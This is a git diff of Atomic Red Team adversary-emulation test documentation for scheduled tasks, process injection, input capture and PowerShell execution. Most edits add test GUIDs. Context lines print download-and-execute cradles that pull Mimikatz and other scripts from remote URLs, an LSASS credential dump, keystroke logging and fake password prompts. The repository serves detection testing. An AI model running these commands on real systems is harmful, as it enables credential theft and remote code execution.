## Atomic Test #1 - Scheduled Task Startup Script + +auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. - **Supported Platforms:** Windows @@ -55,15 +57,17 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
## Atomic Test #2 - Scheduled task Local -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. +auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| @@ -89,17 +93,19 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
## Atomic Test #3 - Scheduled task Remote + +auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| @@ -128,10 +134,12 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
## Atomic Test #4 - Powershell Cmdlet Scheduled Task + +auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - **Supported Platforms:** Windows @@ -163,16 +171,18 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
## Atomic Test #5 - Task Scheduler via VBA + +auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -198,7 +208,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -212,8 +222,10 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task -Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. +auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + +Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. **Supported Platforms:** Windows diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md index 4df70d46..998c17fb 100644 --- a/atomics/T1053.006/T1053.006.md +++ b/atomics/T1053.006/T1053.006.md @@ -14,15 +14,17 @@ An adversary may use systemd timers to execute malicious code at system startup
## Atomic Test #1 - Create Systemd Service and Timer -This test creates Systemd service and timer then starts and enables the Systemd timer +auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + +This test creates Systemd service and timer then starts and enables the Systemd timer **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service| | path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer| diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index b571a9a7..eefb07ca 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -14,15 +14,17 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
## Atomic Test #1 - ListCronjobs -Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + +Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| @@ -43,15 +45,17 @@ kubectl get cronjobs -n #{namespace}
## Atomic Test #2 - CreateCronjob -Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. +auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + +Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | namespace | K8s namespace to list | String | default| diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index d0e78dc8..76a8f433 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -16,18 +16,20 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via mavinject.exe + +auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| | dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll| @@ -48,7 +50,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload} ##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md index 9b71ca04..a007e2cc 100644 --- a/atomics/T1055.004/T1055.004.md +++ b/atomics/T1055.004/T1055.004.md @@ -16,6 +16,9 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via C# + +auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 + Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques @@ -25,14 +28,13 @@ Excercises Five Techniques 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_binary | Output Binary | Path | PathToAtomicsFolder\T1055.004\bin\T1055.exe| diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index f3965a9e..e514407f 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -16,16 +16,18 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
## Atomic Test #1 - Process Hollowing using PowerShell + +auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe| | parent_process_name | Name of the parent process | string | explorer| @@ -55,15 +57,17 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
## Atomic Test #2 - RunPE via VBA -This module executes notepad.exe from within the WINWORD.EXE process +auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + +This module executes notepad.exe from within the WINWORD.EXE process **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -89,7 +93,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 9a4adae9..48f20359 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -16,12 +16,14 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Test #1 - Shellcode execution via VBA + +auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. - **Supported Platforms:** Windows @@ -49,7 +51,7 @@ try { $path = $wdApp.Path Stop-Process -Name "winword" if ($path.contains("(x86)")) { exit 1 } else { exit 0 } -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -63,18 +65,20 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz + +auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | machine | machine to target (via psexec) | string | DC1| | mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| @@ -96,7 +100,7 @@ The effect of `/inject` is explained in ## Atomic Test #1 - Input Capture + +auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 + Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | $env:TEMP\key.log| @@ -58,12 +60,14 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d + +auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b + Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. - **Supported Platforms:** Linux diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index a5a12710..4cedb33c 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -14,9 +14,11 @@ Adversaries may mimic this functionality to prompt users for credentials with a
## Atomic Test #1 - AppleScript - Prompt User for Password + +auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 + Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html - **Supported Platforms:** macOS @@ -39,10 +41,12 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
## Atomic Test #2 - PowerShell - Prompt User for Password + +auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py - **Supported Platforms:** Windows diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index dfb41588..f9fef8ef 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -15,15 +15,17 @@
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages -Hooks functions in PowerShell to read TLS Communications +auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 + +Hooks functions in PowerShell to read TLS Communications **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | Dll To Inject | Path | PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll| | server_name | TLS Server To Test Get Request | Url | https://www.example.com| @@ -44,7 +46,7 @@ curl #{server_name} -UseBasicParsing ##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) {exit 0} else {exit 1} +if (Test-Path #{file_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 0457a658..40a1227b 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -14,17 +14,19 @@ In Windows environments, adversaries could obtain details on running processes u
## Atomic Test #1 - Process Discovery - ps + +auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc + Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt| @@ -50,10 +52,12 @@ rm #{output_file}
## Atomic Test #2 - Process Discovery - tasklist + +auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 + Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. - **Supported Platforms:** Windows diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index 8345c90c..aa9120ec 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,15 +50,17 @@ PowerShell commands/scripts can also be executed without directly invoking the <
## Atomic Test #1 - Mimikatz -Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. +auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027 + +Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| @@ -79,17 +81,19 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - Run BloodHound from local disk + +auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350 + Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | File path for SharpHound payload | String | PathToAtomicsFolder\T1059.001\src| @@ -115,7 +119,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force ##### Description: SharpHound.ps1 must be located at #{file_path} ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} +if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -129,10 +133,12 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle + +auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 + Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. - **Supported Platforms:** Windows @@ -162,8 +168,10 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
## Atomic Test #4 - Obfuscation Tests -Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" +auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 + +Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" **Supported Platforms:** Windows @@ -188,8 +196,10 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys -Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. +auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d + +Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. **Supported Platforms:** Windows @@ -212,10 +222,12 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
## Atomic Test #6 - Invoke-AppPathBypass + +auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372 + Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - **Supported Platforms:** Windows @@ -238,17 +250,19 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
## Atomic Test #7 - Powershell MsXml COM object - with prompt + +auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da + Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1| @@ -269,17 +283,19 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
## Atomic Test #8 - Powershell XML requests + +auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 + Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml| @@ -300,17 +316,19 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
## Atomic Test #9 - Powershell invoke mshta.exe download + +auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af + Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct| @@ -331,9 +349,11 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
## Atomic Test #10 - Powershell Invoke-DownloadCradle + +auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 + Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. - **Supported Platforms:** Windows @@ -353,9 +373,11 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
## Atomic Test #11 - PowerShell Fileless Script Execution + +auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73 + Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. - **Supported Platforms:** Windows @@ -385,10 +407,12 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
## Atomic Test #12 - PowerShell Downgrade Attack + +auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e + This test requires the manual installation of PowerShell V2. Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - **Supported Platforms:** Windows @@ -409,7 +433,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion ##### Description: PowerShell version 2 must be installed ##### Check Prereq Commands: ```powershell -if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} +if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -423,15 +447,17 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
## Atomic Test #13 - NTFS Alternate Data Stream Access -Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. +auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 + +Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt| @@ -456,7 +482,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore ##### Description: Homedrive must be an NTFS drive ##### Check Prereq Commands: ```powershell -if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} +if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -470,16 +496,18 @@ Write-Host Prereq's for this test cannot be met automatically
## Atomic Test #14 - PowerShell Session Creation and Use + +auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd + Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME| @@ -508,7 +536,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell @@ -522,15 +550,17 @@ Enable-PSRemoting
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations -Executes powershell.exe with variations of the -Command parameter +auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7 + +Executes powershell.exe with variations of the -Command parameter **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | command_param_variation | The "Command" parameter variation to use | String | C| @@ -552,7 +582,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -566,15 +596,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments -Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied +auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790 + +Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | command_param_variation | The "Command" parameter variation to use | String | C| @@ -597,7 +629,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -611,15 +643,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations -Executes powershell.exe with variations of the -EncodedCommand parameter +auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 + +Executes powershell.exe with variations of the -EncodedCommand parameter **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E| @@ -641,7 +675,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell @@ -655,15 +689,17 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments -Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied +auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b + +Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E| | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen| @@ -686,7 +722,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit ```powershell $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} -if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} +if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index f748438d..ac93ee4f 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -16,11 +16,13 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
